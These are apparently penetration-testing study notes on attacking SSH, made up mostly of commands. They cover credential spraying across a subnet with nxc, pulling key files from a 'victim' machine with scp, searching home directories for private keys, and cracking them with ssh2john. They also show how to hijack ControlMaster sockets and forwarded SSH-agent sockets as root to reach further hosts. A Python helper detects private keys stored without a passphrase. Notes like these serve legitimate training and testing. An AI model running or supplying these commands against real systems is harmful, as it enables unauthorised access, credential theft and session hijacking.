SSH 22

SSH (Secure Shell, also called Secure Socket Shell) is a network protocol that gives users a secure way to access a computer over an unsecured network.

22/tcp open ssh syn-ack

- Authentication

User/pass auth:

ssh user@IP

nxc ssh 192.168.1.0/24 -u user -p password

nxc ssh 192.168.1.0/24 --port 2222

nxc ssh 127.0.0.1 -u user -p password -x whoami

RSA Key auth:

ssh -i {keyfile} user@IP

- Download files

Once we have credentials, or our public key is on the victim machine, and we can connect through SSH, we can send a file from our machine to the victim machine with the following command:

scp {file} user@IP:/{directory}

To do the opposite and download a file from the victim machine to our machine:

scp linuxvictim@linuxvictim:svuser.key ./

- SSH Lateral Movement

To find keys on Linux:

find /home/ -name "id_rsa"

find /home/ -name "*.key"

To find keys on Windows:

dir /s /b C:\Users\id_rsa

dir /s /b C:\Users\*.key

To tell whether a private key is passphrase-encrypted, check its first few lines; an encrypted legacy PEM key shows:

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,351CBB3ECC54B554DD07029E2C377380

To convert an SSH key to a John the Ripper (JTR) compatible format in order to crack it, we can use ssh2john.
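As an added example (not part of the original notes), a small Python check that tells encrypted from unencrypted private keys in both the legacy PEM format shown above and the newer OpenSSH format, where the cipher name sits inside the base64 blob instead of in a Proc-Type/DEK-Info header. Both sample keys are constructed and carry no real key material.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"  # prefix of the blob in OPENSSH PRIVATE KEY

def _ssh_string(data):
    # SSH wire string: 4-byte big-endian length followed by the payload
    return struct.pack(">I", len(data)) + data

def _read_ssh_string(blob, offset):
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    return blob[offset + 4:offset + 4 + length]

def key_encryption(key_text):
    """Return (format, cipher) for a private key; cipher is None if unencrypted."""
    lines = [line.strip() for line in key_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        # Fields after the magic: ciphername, kdfname, kdfoptions, nkeys, ...
        cipher = _read_ssh_string(blob, len(OPENSSH_MAGIC)).decode()
        return "openssh-v1", None if cipher == "none" else cipher
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): RFC 1421 headers mark encryption
    for line in lines[1:]:
        if line.startswith("DEK-Info:"):
            return "legacy-pem", line.split(":", 1)[1].strip().split(",")[0]
        if line == "":  # blank line ends the header block
            break
    return "legacy-pem", None

def make_openssh_key(cipher, kdf):
    """Constructed sample: openssh-key-v1 header fields only, no key material."""
    blob = OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
    blob += _ssh_string(b"") + struct.pack(">I", 1)  # empty kdfoptions, nkeys=1
    body = base64.b64encode(blob).decode()
    wrapped = "\n".join(body[i:i + 70] for i in range(0, len(body), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed legacy sample reusing the header lines quoted above; body omitted.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,351CBB3ECC54B554DD07029E2C377380

...base64 body omitted...
-----END RSA PRIVATE KEY-----
"""
```

Run over the files that the find commands above locate to spot keys stored without a passphrase.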

To discover new hosts:

cat ~/.ssh/known_hosts

Alternatively, inspect the environment variables to locate hosts and the keys used. The first command is not useful if the HashKnownHosts option is enabled in /etc/ssh/ssh_config.

If we notice that the user SSHes to a machine named "controller", we can determine its IP address with:

host controller

To ssh with a found key to a domain user named vulnuser in a domain named example.com (double backslash):

proxychains ssh -i vulnuser_id_rsa example\\vulnuser@{IP}

- SSH Hijacking with ControlMaster

ControlMaster is a feature that enables sharing of multiple SSH sessions over a single network connection. This functionality can be enabled for a given user by editing their local SSH configuration file (~/.ssh/config).

ls -al ~/.ssh/controlmaster/

If the folder exists but contains no socket file, run pspy to see whether someone logs in; if so, wait for the socket to appear and then SSH into the victim. To monitor the folder:

watch -n 1 ls -al ~/.ssh/controlmaster/

At this point, as an attacker, if we simply SSH to the server listed in the victim’s socket file, we will not be prompted for a password and are given direct access to the linuxvictim machine via SSH.

If we are root we can hijack an open SSH socket:

ls -al /home/user/.ssh/controlmaster

ssh -S /home/user/.ssh/controlmaster/user\@linuxvictim\:22 user@linuxvictim

- SSH Hijacking Using SSH-Agent and SSH Agent Forwarding

SSH-Agent is a utility that keeps track of a user’s private keys and allows them to be used without having to repeat their passphrases on every connection.

SSH agent forwarding is a mechanism that allows a user to use the SSH-Agent on an intermediate server as if it were their own local agent on their originating machine. This is useful in situations where a user might need to ssh from an intermediate host into another network segment, which can’t be directly accessed from the originating machine. It has the advantage of not requiring the private key to be stored on the intermediate server and the user does not need to enter their passphrase more than once.

We can check whether they are enabled in ~/.ssh/config (the ForwardAgent and ControlMaster options).

First scenario: we have compromised the account of a user who is logged in to the intermediate server, so we can ssh to the victim machine.

Second scenario: we have compromised the controller and hold root privileges on it:

pstree -p user | grep ssh

cat /proc/16381/environ

Now we can use the victim’s SSH agent socket file as if it were our own:

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh user@linuxvictim

- Password Spraying

nxc ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
